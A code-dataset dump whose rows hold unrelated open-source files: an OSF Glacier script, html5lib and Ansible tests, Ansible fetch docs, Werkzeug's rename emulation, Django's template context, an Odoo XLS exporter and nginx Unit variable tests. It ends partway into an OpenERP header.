repo_name stringlengths 5 100 | path stringlengths 4 375 | copies stringclasses 991 values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15 values |
|---|---|---|---|---|---|
rdhyee/osf.io | scripts/osfstorage/glacier_inventory.py | 18 | 1122 | #!/usr/bin/env python
# encoding: utf-8
"""Begin retrieve inventory job on Glacier vault. Should be run in conjunction
with `glacier_audit.py`.
"""
import logging
import datetime
from boto.glacier.layer2 import Layer2
from framework.celery_tasks import app as celery_app
from scripts import utils as scripts_utils
from scripts.osfstorage import settings as storage_settings
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
scripts_utils.add_file_logger(logger, __file__)
def get_vault():
    """Connect to AWS Glacier and return the configured vault.

    Credentials and the vault name are read from the osfstorage
    settings module.
    """
    connection = Layer2(
        aws_access_key_id=storage_settings.AWS_ACCESS_KEY,
        aws_secret_access_key=storage_settings.AWS_SECRET_KEY,
    )
    return connection.get_vault(storage_settings.GLACIER_VAULT)
def main():
    """Start a Glacier inventory-retrieval job and log its id."""
    timestamp = datetime.datetime.utcnow().strftime('%c')
    vault = get_vault()
    # The SNS topic is notified when the (slow) inventory job completes;
    # glacier_audit.py picks the result up from there.
    job = vault.retrieve_inventory_job(
        description='glacier-audit-{}'.format(timestamp),
        sns_topic=storage_settings.AWS_SNS_ARN,
    )
    logger.info('Started retrieve inventory job with id {}'.format(job.id))
@celery_app.task(name='scripts.osfstorage.glacier_inventory')
def run_main():
    # Celery entry point; delegates to main() so the script logic can also
    # be invoked directly.
    main()
| apache-2.0 |
TaskEvolution/Task-Coach-Evolution | taskcoach/taskcoachlib/thirdparty/html5lib/html5lib/tests/test_stream.py | 4 | 5732 | from __future__ import absolute_import, division, unicode_literals
from . import support # flake8: noqa
import unittest
import codecs
from io import BytesIO
from html5lib.inputstream import (BufferedStream, HTMLInputStream,
HTMLUnicodeInputStream, HTMLBinaryInputStream)
class BufferedStreamTest(unittest.TestCase):
    """Tests for BufferedStream's read/tell/seek behaviour over a BytesIO."""

    def test_basic(self):
        s = b"abc"
        fp = BufferedStream(BytesIO(s))
        # Asking for more bytes than exist returns what is available.
        read = fp.read(10)
        assert read == s

    def test_read_length(self):
        fp = BufferedStream(BytesIO(b"abcdef"))
        read1 = fp.read(1)
        assert read1 == b"a"
        read2 = fp.read(2)
        assert read2 == b"bc"
        read3 = fp.read(3)
        assert read3 == b"def"
        # Reading past EOF yields an empty bytes object.
        read4 = fp.read(4)
        assert read4 == b""

    def test_tell(self):
        fp = BufferedStream(BytesIO(b"abcdef"))
        read1 = fp.read(1)
        assert fp.tell() == 1
        read2 = fp.read(2)
        assert fp.tell() == 3
        read3 = fp.read(3)
        assert fp.tell() == 6
        # Position must not advance past EOF.
        read4 = fp.read(4)
        assert fp.tell() == 6

    def test_seek(self):
        fp = BufferedStream(BytesIO(b"abcdef"))
        read1 = fp.read(1)
        assert read1 == b"a"
        fp.seek(0)
        read2 = fp.read(1)
        assert read2 == b"a"
        read3 = fp.read(2)
        assert read3 == b"bc"
        fp.seek(2)
        read4 = fp.read(2)
        assert read4 == b"cd"
        fp.seek(4)
        read5 = fp.read(2)
        assert read5 == b"ef"

    def test_seek_tell(self):
        # Interleave seeks and reads and check tell() stays consistent.
        fp = BufferedStream(BytesIO(b"abcdef"))
        read1 = fp.read(1)
        assert fp.tell() == 1
        fp.seek(0)
        read2 = fp.read(1)
        assert fp.tell() == 1
        read3 = fp.read(2)
        assert fp.tell() == 3
        fp.seek(2)
        read4 = fp.read(2)
        assert fp.tell() == 4
        fp.seek(4)
        read5 = fp.read(2)
        assert fp.tell() == 6
class HTMLUnicodeInputStreamShortChunk(HTMLUnicodeInputStream):
    # Tiny chunk size so tests exercise behaviour across chunk boundaries.
    _defaultChunkSize = 2
class HTMLBinaryInputStreamShortChunk(HTMLBinaryInputStream):
    # Tiny chunk size so tests exercise behaviour across chunk boundaries.
    _defaultChunkSize = 2
class HTMLInputStreamTest(unittest.TestCase):
    """Tests for encoding detection, BOM handling, newline normalisation
    and (line, column) position tracking in the HTML input streams."""

    def test_char_ascii(self):
        stream = HTMLInputStream(b"'", encoding='ascii')
        self.assertEqual(stream.charEncoding[0], 'ascii')
        self.assertEqual(stream.char(), "'")

    def test_char_utf8(self):
        stream = HTMLInputStream('\u2018'.encode('utf-8'), encoding='utf-8')
        self.assertEqual(stream.charEncoding[0], 'utf-8')
        self.assertEqual(stream.char(), '\u2018')

    def test_char_win1252(self):
        # No explicit encoding: sniffing should settle on windows-1252.
        stream = HTMLInputStream("\xa9\xf1\u2019".encode('windows-1252'))
        self.assertEqual(stream.charEncoding[0], 'windows-1252')
        self.assertEqual(stream.char(), "\xa9")
        self.assertEqual(stream.char(), "\xf1")
        self.assertEqual(stream.char(), "\u2019")

    def test_bom(self):
        # A UTF-8 BOM selects utf-8 and is not returned as a character.
        stream = HTMLInputStream(codecs.BOM_UTF8 + b"'")
        self.assertEqual(stream.charEncoding[0], 'utf-8')
        self.assertEqual(stream.char(), "'")

    def test_utf_16(self):
        stream = HTMLInputStream((' ' * 1025).encode('utf-16'))
        self.assertTrue(stream.charEncoding[0] in ['utf-16-le', 'utf-16-be'], stream.charEncoding)
        self.assertEqual(len(stream.charsUntil(' ', True)), 1025)

    def test_newlines(self):
        # \r and \r\n are both normalised to \n, across short chunks.
        stream = HTMLBinaryInputStreamShortChunk(codecs.BOM_UTF8 + b"a\nbb\r\nccc\rddddxe")
        self.assertEqual(stream.position(), (1, 0))
        self.assertEqual(stream.charsUntil('c'), "a\nbb\n")
        self.assertEqual(stream.position(), (3, 0))
        self.assertEqual(stream.charsUntil('x'), "ccc\ndddd")
        self.assertEqual(stream.position(), (4, 4))
        self.assertEqual(stream.charsUntil('e'), "x")
        self.assertEqual(stream.position(), (4, 5))

    def test_newlines2(self):
        # A \r falling exactly on a chunk boundary must still normalise.
        size = HTMLUnicodeInputStream._defaultChunkSize
        stream = HTMLInputStream("\r" * size + "\n")
        self.assertEqual(stream.charsUntil('x'), "\n" * size)

    def test_position(self):
        stream = HTMLBinaryInputStreamShortChunk(codecs.BOM_UTF8 + b"a\nbb\nccc\nddde\nf\ngh")
        self.assertEqual(stream.position(), (1, 0))
        self.assertEqual(stream.charsUntil('c'), "a\nbb\n")
        self.assertEqual(stream.position(), (3, 0))
        # unget() must roll the reported position back as well.
        stream.unget("\n")
        self.assertEqual(stream.position(), (2, 2))
        self.assertEqual(stream.charsUntil('c'), "\n")
        self.assertEqual(stream.position(), (3, 0))
        stream.unget("\n")
        self.assertEqual(stream.position(), (2, 2))
        self.assertEqual(stream.char(), "\n")
        self.assertEqual(stream.position(), (3, 0))
        self.assertEqual(stream.charsUntil('e'), "ccc\nddd")
        self.assertEqual(stream.position(), (4, 3))
        self.assertEqual(stream.charsUntil('h'), "e\nf\ng")
        self.assertEqual(stream.position(), (6, 1))

    def test_position2(self):
        # Character-by-character position tracking across a newline.
        stream = HTMLUnicodeInputStreamShortChunk("abc\nd")
        self.assertEqual(stream.position(), (1, 0))
        self.assertEqual(stream.char(), "a")
        self.assertEqual(stream.position(), (1, 1))
        self.assertEqual(stream.char(), "b")
        self.assertEqual(stream.position(), (1, 2))
        self.assertEqual(stream.char(), "c")
        self.assertEqual(stream.position(), (1, 3))
        self.assertEqual(stream.char(), "\n")
        self.assertEqual(stream.position(), (2, 0))
        self.assertEqual(stream.char(), "d")
        self.assertEqual(stream.position(), (2, 1))
def buildTestSuite():
    # Collect every TestCase defined in this module.
    return unittest.defaultTestLoader.loadTestsFromName(__name__)


def main():
    # Build the suite, then hand control to unittest's CLI runner.
    buildTestSuite()
    unittest.main()


if __name__ == '__main__':
    main()
| gpl-3.0 |
pshen/ansible | lib/ansible/modules/files/fetch.py | 27 | 4058 | # this is a virtual module that is entirely implemented server side
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Module maturity/support metadata consumed by Ansible's documentation
# and validation tooling.
ANSIBLE_METADATA = {'metadata_version': '1.0',
                    'status': ['stableinterface'],
                    'supported_by': 'core'}
DOCUMENTATION = '''
---
module: fetch
short_description: Fetches a file from remote nodes
description:
- This module works like M(copy), but in reverse. It is used for fetching
files from remote machines and storing them locally in a file tree,
organized by hostname.
version_added: "0.2"
options:
src:
description:
- The file on the remote system to fetch. This I(must) be a file, not a
directory. Recursive fetching may be supported in a later release.
required: true
default: null
aliases: []
dest:
description:
- A directory to save the file into. For example, if the I(dest)
directory is C(/backup) a I(src) file named C(/etc/profile) on host
C(host.example.com), would be saved into
C(/backup/host.example.com/etc/profile)
required: true
default: null
fail_on_missing:
version_added: "1.1"
description:
- When set to 'yes', the task will fail if the remote file cannot be
read for any reason. Prior to Ansible-2.4, setting this would only fail
if the source file was missing.
- The default was changed to "yes" in Ansible-2.4.
required: false
choices: [ "yes", "no" ]
default: "yes"
validate_checksum:
version_added: "1.4"
description:
- Verify that the source and destination checksums match after the files are fetched.
required: false
choices: [ "yes", "no" ]
default: "yes"
aliases: [ "validate_md5" ]
flat:
version_added: "1.2"
description:
- Allows you to override the default behavior of appending
hostname/path/to/file to the destination. If dest ends with '/', it
will use the basename of the source file, similar to the copy module.
Obviously this is only handy if the filenames are unique.
requirements: []
author:
- "Ansible Core Team"
- "Michael DeHaan"
notes:
- When running fetch with C(become), the M(slurp) module will also be
used to fetch the contents of the file for determining the remote
checksum. This effectively doubles the transfer size, and
depending on the file size can consume all available memory on the
remote or local hosts causing a C(MemoryError). Due to this it is
advisable to run this module without C(become) whenever possible.
  - Prior to Ansible-2.4 this module would not fail if reading the remote
    file was impossible unless fail_on_missing was set. In Ansible-2.4+,
    playbook authors are encouraged to use failed_when or ignore_errors to
    get this ability. They may also explicitly set fail_on_missing to False
    to get the non-failing behaviour.
'''
EXAMPLES = '''
# Store file into /tmp/fetched/host.example.com/tmp/somefile
- fetch:
src: /tmp/somefile
dest: /tmp/fetched
# Specifying a path directly
- fetch:
src: /tmp/somefile
dest: /tmp/prefix-{{ inventory_hostname }}
flat: yes
# Specifying a destination path
- fetch:
src: /tmp/uniquefile
dest: /tmp/special/
flat: yes
# Storing in a path relative to the playbook
- fetch:
src: /tmp/uniquefile
dest: special/prefix-{{ inventory_hostname }}
flat: yes
'''
| gpl-3.0 |
josephlewis42/magpie | magpie/lib/werkzeug/posixemulation.py | 319 | 3543 | # -*- coding: utf-8 -*-
r"""
werkzeug.posixemulation
~~~~~~~~~~~~~~~~~~~~~~~
Provides a POSIX emulation for some features that are relevant to
web applications. The main purpose is to simplify support for
systems such as Windows NT that are not 100% POSIX compatible.
Currently this only implements a :func:`rename` function that
follows POSIX semantics. Eg: if the target file already exists it
will be replaced without asking.
This module was introduced in 0.6.1 and is not a public interface.
It might become one in later versions of Werkzeug.
:copyright: (c) 2013 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import sys
import os
import errno
import time
import random
# True when the platform can replace a destination file that is still open.
can_rename_open_file = False

if os.name == 'nt':  # pragma: no cover
    # Fallback stubs; replaced by the ctypes-based versions below when the
    # required kernel APIs are available.
    _rename = lambda src, dst: False
    _rename_atomic = lambda src, dst: False

    try:
        import ctypes

        _MOVEFILE_REPLACE_EXISTING = 0x1
        _MOVEFILE_WRITE_THROUGH = 0x8
        _MoveFileEx = ctypes.windll.kernel32.MoveFileExW

        def _rename(src, dst):
            # MoveFileExW takes wide strings (Python 2 ``unicode``).
            if not isinstance(src, unicode):
                src = unicode(src, sys.getfilesystemencoding())
            if not isinstance(dst, unicode):
                dst = unicode(dst, sys.getfilesystemencoding())
            if _rename_atomic(src, dst):
                return True
            retry = 0
            rv = False
            # Retry with short sleeps: the target may be transiently
            # locked by another process on Windows.
            while not rv and retry < 100:
                rv = _MoveFileEx(src, dst, _MOVEFILE_REPLACE_EXISTING |
                                 _MOVEFILE_WRITE_THROUGH)
                if not rv:
                    time.sleep(0.001)
                    retry += 1
            return rv

        # new in Vista and Windows Server 2008
        _CreateTransaction = ctypes.windll.ktmw32.CreateTransaction
        _CommitTransaction = ctypes.windll.ktmw32.CommitTransaction
        _MoveFileTransacted = ctypes.windll.kernel32.MoveFileTransactedW
        _CloseHandle = ctypes.windll.kernel32.CloseHandle
        can_rename_open_file = True

        def _rename_atomic(src, dst):
            # Move inside a kernel transaction so the rename is atomic.
            ta = _CreateTransaction(None, 0, 0, 0, 0, 1000, 'Werkzeug rename')
            if ta == -1:
                return False
            try:
                retry = 0
                rv = False
                while not rv and retry < 100:
                    rv = _MoveFileTransacted(src, dst, None, None,
                                             _MOVEFILE_REPLACE_EXISTING |
                                             _MOVEFILE_WRITE_THROUGH, ta)
                    if rv:
                        rv = _CommitTransaction(ta)
                        break
                    else:
                        time.sleep(0.001)
                        retry += 1
                return rv
            finally:
                # Always release the transaction handle.
                _CloseHandle(ta)
    except Exception:
        # ctypes or the transactional APIs are unavailable; keep the stubs.
        pass

    def rename(src, dst):
        # Try atomic or pseudo-atomic rename
        if _rename(src, dst):
            return
        # Fall back to "move away and replace"
        try:
            os.rename(src, dst)
        except OSError as e:
            if e.errno != errno.EEXIST:
                raise
            # Move the existing destination aside under a random name,
            # rename into place, then best-effort delete the old file.
            old = "%s-%08x" % (dst, random.randint(0, sys.maxint))
            os.rename(dst, old)
            os.rename(src, dst)
            try:
                os.unlink(old)
            except Exception:
                pass
else:
    # POSIX rename already replaces an existing target atomically.
    rename = os.rename
    can_rename_open_file = True
| bsd-3-clause |
Richard2ndQuadrant/ansible | test/units/template/test_template_utilities.py | 152 | 4567 | # (c) 2015 Toshio Kuratomi <tkuratomi@ansible.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import jinja2
from ansible.compat.tests import unittest
from ansible.template import _escape_backslashes, _count_newlines_from_end
# These are internal utility functions only needed for templating. They're
# algorithmic so good candidates for unittesting by themselves
class TestBackslashEscape(unittest.TestCase):
    """Tests for _escape_backslashes.

    Each test_data entry holds the raw template, the expected intermediate
    template after escaping, the final rendered expectation, and the
    variables to render with.
    """
    test_data = (
        # Test backslashes in a filter arg are double escaped
        dict(
            template=u"{{ 'test2 %s' | format('\\1') }}",
            intermediate=u"{{ 'test2 %s' | format('\\\\1') }}",
            expectation=u"test2 \\1",
            args=dict()
        ),
        # Test backslashes inside the jinja2 var itself are double
        # escaped
        dict(
            template=u"Test 2\\3: {{ '\\1 %s' | format('\\2') }}",
            intermediate=u"Test 2\\3: {{ '\\\\1 %s' | format('\\\\2') }}",
            expectation=u"Test 2\\3: \\1 \\2",
            args=dict()
        ),
        # Test backslashes outside of the jinja2 var are not double
        # escaped
        dict(
            template=u"Test 2\\3: {{ 'test2 %s' | format('\\1') }}; \\done",
            intermediate=u"Test 2\\3: {{ 'test2 %s' | format('\\\\1') }}; \\done",
            expectation=u"Test 2\\3: test2 \\1; \\done",
            args=dict()
        ),
        # Test backslashes in a variable sent to a filter are handled
        dict(
            template=u"{{ 'test2 %s' | format(var1) }}",
            intermediate=u"{{ 'test2 %s' | format(var1) }}",
            expectation=u"test2 \\1",
            args=dict(var1=u'\\1')
        ),
        # Test backslashes in a variable expanded by jinja2 are double
        # escaped
        dict(
            template=u"Test 2\\3: {{ var1 | format('\\2') }}",
            intermediate=u"Test 2\\3: {{ var1 | format('\\\\2') }}",
            expectation=u"Test 2\\3: \\1 \\2",
            args=dict(var1=u'\\1 %s')
        ),
    )

    def setUp(self):
        self.env = jinja2.Environment()

    def tearDown(self):
        pass

    def test_backslash_escaping(self):
        # For each case: escape, check the intermediate form, then render
        # the intermediate template and check the final output.
        for test in self.test_data:
            intermediate = _escape_backslashes(test['template'], self.env)
            self.assertEquals(intermediate, test['intermediate'])
            template = jinja2.Template(intermediate)
            args = test['args']
            self.assertEquals(template.render(**args), test['expectation'])
class TestCountNewlines(unittest.TestCase):
    """Tests for _count_newlines_from_end on strings of varying sizes."""

    def setUp(self):
        pass

    def tearDown(self):
        pass

    def test_zero_length_string(self):
        self.assertEquals(_count_newlines_from_end(u''), 0)

    def test_short_string(self):
        self.assertEquals(_count_newlines_from_end(u'The quick\n'), 1)

    def test_one_newline(self):
        self.assertEquals(_count_newlines_from_end(u'The quick brown fox jumped over the lazy dog' * 1000 + u'\n'), 1)

    def test_multiple_newlines(self):
        self.assertEquals(_count_newlines_from_end(u'The quick brown fox jumped over the lazy dog' * 1000 + u'\n\n\n'), 3)

    def test_zero_newlines(self):
        self.assertEquals(_count_newlines_from_end(u'The quick brown fox jumped over the lazy dog' * 1000), 0)

    def test_all_newlines(self):
        self.assertEquals(_count_newlines_from_end(u'\n' * 10), 10)

    def test_mostly_newlines(self):
        self.assertEquals(_count_newlines_from_end(u'The quick brown fox jumped over the lazy dog' + u'\n' * 1000), 1000)
| gpl-3.0 |
olasitarska/django | django/template/context.py | 87 | 6758 | from copy import copy
from django.utils.module_loading import import_string
# Cache of actual callables.
_standard_context_processors = None
# We need the CSRF processor no matter what the user has in their settings,
# because otherwise it is a security vulnerability, and we can't afford to leave
# this to human error or failure to read migration instructions.
_builtin_context_processors = ('django.core.context_processors.csrf',)
class ContextPopException(Exception):
    """Raised when pop() has been called more times than push()."""
    pass
class ContextDict(dict):
    """A dict that registers itself on a context's stack when created.

    Usable as a context manager: leaving the ``with`` block pops it back
    off the owning context.
    """

    def __init__(self, context, *args, **kwargs):
        super(ContextDict, self).__init__(*args, **kwargs)
        self.context = context
        context.dicts.append(self)

    def __enter__(self):
        return self

    def __exit__(self, *exc_info):
        self.context.pop()
class BaseContext(object):
    """A stack of dictionaries with dict-like lookup semantics.

    Reads walk the stack from the most recently pushed dict down to the
    builtins layer; writes and deletes always target the top of the stack.
    """

    def __init__(self, dict_=None):
        self._reset_dicts(dict_)

    def _reset_dicts(self, value=None):
        # The bottom layer always exposes the template builtins.
        self.dicts = [{'True': True, 'False': False, 'None': None}]
        if value is not None:
            self.dicts.append(value)

    def __copy__(self):
        duplicate = copy(super(BaseContext, self))
        # Copy the stack itself but share the individual dicts.
        duplicate.dicts = self.dicts[:]
        return duplicate

    def __repr__(self):
        return repr(self.dicts)

    def __iter__(self):
        # Most recently pushed dict first.
        return iter(reversed(self.dicts))

    def push(self, *args, **kwargs):
        return ContextDict(self, *args, **kwargs)

    def pop(self):
        # The builtins layer must never be removed.
        if len(self.dicts) == 1:
            raise ContextPopException
        return self.dicts.pop()

    def __setitem__(self, key, value):
        "Set a variable in the current context"
        self.dicts[-1][key] = value

    def __getitem__(self, key):
        "Get a variable's value, starting at the current context and going upward"
        for layer in reversed(self.dicts):
            if key in layer:
                return layer[key]
        raise KeyError(key)

    def __delitem__(self, key):
        "Delete a variable from the current context"
        del self.dicts[-1][key]

    def has_key(self, key):
        return any(key in layer for layer in self.dicts)

    def __contains__(self, key):
        return self.has_key(key)

    def get(self, key, otherwise=None):
        for layer in reversed(self.dicts):
            if key in layer:
                return layer[key]
        return otherwise

    def new(self, values=None):
        """
        Returns a new context with the same properties, but with only the
        values given in 'values' stored.
        """
        fresh = copy(self)
        fresh._reset_dicts(values)
        return fresh

    def flatten(self):
        """
        Returns self.dicts as one dictionary
        """
        merged = {}
        for layer in self.dicts:
            merged.update(layer)
        return merged

    def __eq__(self, other):
        """
        Compares two contexts by comparing theirs 'dicts' attributes.
        """
        if not isinstance(other, BaseContext):
            # Anything that is not a context is never equal.
            return False
        # The stacks may be layered differently, so compare flattened.
        return self.flatten() == other.flatten()
class Context(BaseContext):
    "A stack container for variable context"
    def __init__(self, dict_=None, autoescape=True, current_app=None,
                 use_l10n=None, use_tz=None):
        self.autoescape = autoescape
        self.current_app = current_app
        self.use_l10n = use_l10n
        self.use_tz = use_tz
        # Per-render template state lives in its own separate stack.
        self.render_context = RenderContext()
        super(Context, self).__init__(dict_)

    def __copy__(self):
        duplicate = super(Context, self).__copy__()
        # Copy the render context too so renders stay independent.
        duplicate.render_context = copy(self.render_context)
        return duplicate

    def update(self, other_dict):
        "Pushes other_dict to the stack of dictionaries in the Context"
        if not hasattr(other_dict, '__getitem__'):
            raise TypeError('other_dict must be a mapping (dictionary-like) object.')
        self.dicts.append(other_dict)
        return other_dict
class RenderContext(BaseContext):
    """
    A stack container for storing Template state.

    RenderContext simplifies the implementation of template Nodes by providing a
    safe place to store state between invocations of a node's `render` method.

    The RenderContext also provides scoping rules that are more sensible for
    'template local' variables. The render context stack is pushed before each
    template is rendered, creating a fresh scope with nothing in it. Name
    resolution fails if a variable is not found at the top of the RequestContext
    stack. Thus, variables are local to a specific template and don't affect the
    rendering of other templates as they would if they were stored in the normal
    template context.
    """
    def __iter__(self):
        # Unlike BaseContext, only the topmost dict is visible.
        for d in self.dicts[-1]:
            yield d

    def has_key(self, key):
        # Lookup is restricted to the top of the stack.
        return key in self.dicts[-1]

    def get(self, key, otherwise=None):
        return self.dicts[-1].get(key, otherwise)

    def __getitem__(self, key):
        return self.dicts[-1][key]
# This is a function rather than module-level procedural code because we only
# want it to execute if somebody uses RequestContext.
def get_standard_processors():
    """Import and cache the configured context processor callables.

    The builtin CSRF processor is always included first; the result is
    memoized in ``_standard_context_processors``.
    """
    from django.conf import settings
    global _standard_context_processors
    if _standard_context_processors is None:
        processors = []
        collect = []
        collect.extend(_builtin_context_processors)
        collect.extend(settings.TEMPLATE_CONTEXT_PROCESSORS)
        for path in collect:
            func = import_string(path)
            processors.append(func)
        _standard_context_processors = tuple(processors)
    return _standard_context_processors
class RequestContext(Context):
    """
    This subclass of template.Context automatically populates itself using
    the processors defined in TEMPLATE_CONTEXT_PROCESSORS.

    Additional processors can be specified as a list of callables
    using the "processors" keyword argument.
    """
    def __init__(self, request, dict_=None, processors=None, current_app=None,
                 use_l10n=None, use_tz=None):
        Context.__init__(self, dict_, current_app=current_app,
                         use_l10n=use_l10n, use_tz=use_tz)
        if processors is None:
            processors = ()
        else:
            processors = tuple(processors)
        # Run every processor against the request and push the combined
        # result onto the stack as a single dict.
        updates = dict()
        for processor in get_standard_processors() + processors:
            updates.update(processor(request))
        self.update(updates)
| bsd-3-clause |
Daniel-CA/odoo | addons/web_graph/controllers/main.py | 32 | 3598 | from openerp import http
import simplejson
from openerp.tools import ustr
from openerp.http import request, serialize_exception as _serialize_exception
from cStringIO import StringIO
from collections import deque
try:
import xlwt
except ImportError:
xlwt = None
class TableExporter(http.Controller):
    """HTTP endpoints that export the web_graph pivot table as an .xls file."""

    @http.route('/web_graph/check_xlwt', type='json', auth='none')
    def check_xlwt(self):
        # Tell the client whether XLS export is available on this server.
        return xlwt is not None

    @http.route('/web_graph/export_xls', type='http', auth="user")
    def export_xls(self, data, token):
        """Render the JSON-serialized pivot table *data* as an .xls attachment."""
        jdata = simplejson.loads(data)
        nbr_measures = jdata['nbr_measures']
        workbook = xlwt.Workbook()
        worksheet = workbook.add_sheet(jdata['title'][:30])
        header_bold = xlwt.easyxf("font: bold on; pattern: pattern solid, fore_colour gray25;")
        header_plain = xlwt.easyxf("pattern: pattern solid, fore_colour gray25;")
        bold = xlwt.easyxf("font: bold on;")
        # Step 1: writing headers
        headers = jdata['headers']
        # x,y: current coordinates
        # carry: queue containing cell information when a cell has a >= 2 height
        # and the drawing code needs to add empty cells below
        x, y, carry = 1, 0, deque()
        for i, header_row in enumerate(headers):
            worksheet.write(i, 0, '', header_plain)
            for header in header_row:
                # Flush any carried-over (multi-row) cells that end here.
                while (carry and carry[0]['x'] == x):
                    cell = carry.popleft()
                    for i in range(nbr_measures):
                        worksheet.write(y, x+i, '', header_plain)
                    if cell['height'] > 1:
                        carry.append({'x': x, 'height': cell['height'] - 1})
                    x = x + nbr_measures
                style = header_plain if 'expanded' in header else header_bold
                for i in range(header['width']):
                    worksheet.write(y, x + i, header['title'] if i == 0 else '', style)
                if header['height'] > 1:
                    # Remember to pad the rows below this tall cell.
                    carry.append({'x': x, 'height': header['height'] - 1})
                x = x + header['width'];
            # Flush carried cells that end at the right edge of the row.
            while (carry and carry[0]['x'] == x):
                cell = carry.popleft()
                for i in range(nbr_measures):
                    worksheet.write(y, x+i, '', header_plain)
                if cell['height'] > 1:
                    carry.append({'x': x, 'height': cell['height'] - 1})
                x = x + nbr_measures
            x, y = 1, y + 1
        # Step 2: measure row
        if nbr_measures > 1:
            worksheet.write(y, 0, '', header_plain)
            for measure in jdata['measure_row']:
                style = header_bold if measure['is_bold'] else header_plain
                worksheet.write(y, x, measure['text'], style);
                x = x + 1
            y = y + 1
        # Step 3: writing data
        x = 0
        for row in jdata['rows']:
            worksheet.write(y, x, row['indent'] * ' ' + ustr(row['title']), header_plain)
            for cell in row['cells']:
                x = x + 1
                if cell.get('is_bold', False):
                    worksheet.write(y, x, cell['value'], bold)
                else:
                    worksheet.write(y, x, cell['value'])
            x, y = 0, y + 1
        # Stream the workbook back as a download.
        response = request.make_response(None,
            headers=[('Content-Type', 'application/vnd.ms-excel'),
                     ('Content-Disposition', 'attachment; filename=table.xls;')],
            cookies={'fileToken': token})
        workbook.save(response.stream)
        return response
| agpl-3.0 |
nginx/unit | test/test_variables.py | 1 | 4067 | from unit.applications.proto import TestApplicationProto
class TestVariables(TestApplicationProto):
    """Integration tests for Unit's variable expansion ($method, $uri, $host)
    in listener "pass" values."""
    prerequisites = {}

    def setup_method(self):
        # Route names below are the strings the variable expressions in the
        # individual tests are expected to resolve to.
        assert 'success' in self.conf(
            {
                "listeners": {"*:7080": {"pass": "routes/$method"}},
                "routes": {
                    "GET": [{"action": {"return": 201}}],
                    "POST": [{"action": {"return": 202}}],
                    "3": [{"action": {"return": 203}}],
                    "4*": [{"action": {"return": 204}}],
                    "blahGET}": [{"action": {"return": 205}}],
                    "5GET": [{"action": {"return": 206}}],
                    "GETGET": [{"action": {"return": 207}}],
                    "localhost": [{"action": {"return": 208}}],
                },
            },
        ), 'configure routes'

    def conf_routes(self, routes):
        # Swap only the listener's "pass" expression.
        assert 'success' in self.conf(routes, 'listeners/*:7080/pass')

    def test_variables_method(self):
        assert self.get()['status'] == 201, 'method GET'
        assert self.post()['status'] == 202, 'method POST'

    def test_variables_uri(self):
        self.conf_routes("\"routes$uri\"")
        assert self.get(url='/3')['status'] == 203, 'uri'
        assert self.get(url='/4*')['status'] == 204, 'uri 2'
        # Percent-encoded characters must be decoded before matching.
        assert self.get(url='/4%2A')['status'] == 204, 'uri 3'

    def test_variables_host(self):
        self.conf_routes("\"routes/$host\"")

        def check_host(host, status=208):
            assert (
                self.get(headers={'Host': host, 'Connection': 'close'})[
                    'status'
                ]
                == status
            )

        # Trailing dot and port are normalised away; other variants miss.
        check_host('localhost')
        check_host('localhost.')
        check_host('localhost:7080')
        check_host('.localhost', 404)
        check_host('www.localhost', 404)
        check_host('localhost1', 404)

    def test_variables_many(self):
        # Adjacent variables, with and without braces.
        self.conf_routes("\"routes$uri$method\"")
        assert self.get(url='/5')['status'] == 206, 'many'
        self.conf_routes("\"routes${uri}${method}\"")
        assert self.get(url='/5')['status'] == 206, 'many 2'
        self.conf_routes("\"routes${uri}$method\"")
        assert self.get(url='/5')['status'] == 206, 'many 3'
        self.conf_routes("\"routes/$method$method\"")
        assert self.get()['status'] == 207, 'many 4'
        self.conf_routes("\"routes/$method$uri\"")
        assert self.get()['status'] == 404, 'no route'
        assert self.get(url='/blah')['status'] == 404, 'no route 2'

    def test_variables_replace(self):
        # Reconfiguring the pass expression takes effect immediately.
        assert self.get()['status'] == 201
        self.conf_routes("\"routes$uri\"")
        assert self.get(url='/3')['status'] == 203
        self.conf_routes("\"routes/${method}\"")
        assert self.post()['status'] == 202
        self.conf_routes("\"routes${uri}\"")
        assert self.get(url='/4*')['status'] == 204
        self.conf_routes("\"routes/blah$method}\"")
        assert self.get()['status'] == 205

    def test_variables_upstream(self):
        assert 'success' in self.conf(
            {
                "listeners": {
                    "*:7080": {"pass": "upstreams$uri"},
                    "*:7081": {"pass": "routes/one"},
                },
                "upstreams": {"1": {"servers": {"127.0.0.1:7081": {}}}},
                "routes": {"one": [{"action": {"return": 200}}]},
            },
        ), 'upstreams initial configuration'

        assert self.get(url='/1')['status'] == 200
        assert self.get(url='/2')['status'] == 404

    def test_variables_invalid(self):
        # Malformed variable syntax must be rejected at configuration time.
        def check_variables(routes):
            assert 'error' in self.conf(
                routes, 'listeners/*:7080/pass'
            ), 'invalid variables'

        check_variables("\"routes$\"")
        check_variables("\"routes${\"")
        check_variables("\"routes${}\"")
        check_variables("\"routes$ur\"")
        check_variables("\"routes$uriblah\"")
        check_variables("\"routes${uri\"")
        check_variables("\"routes${{uri}\"")
| apache-2.0 |
enapps/enapps-openerp-server | openerp/tools/misc.py | 1 | 41349 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
# Copyright (C) 2010-2012 OpenERP s.a. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
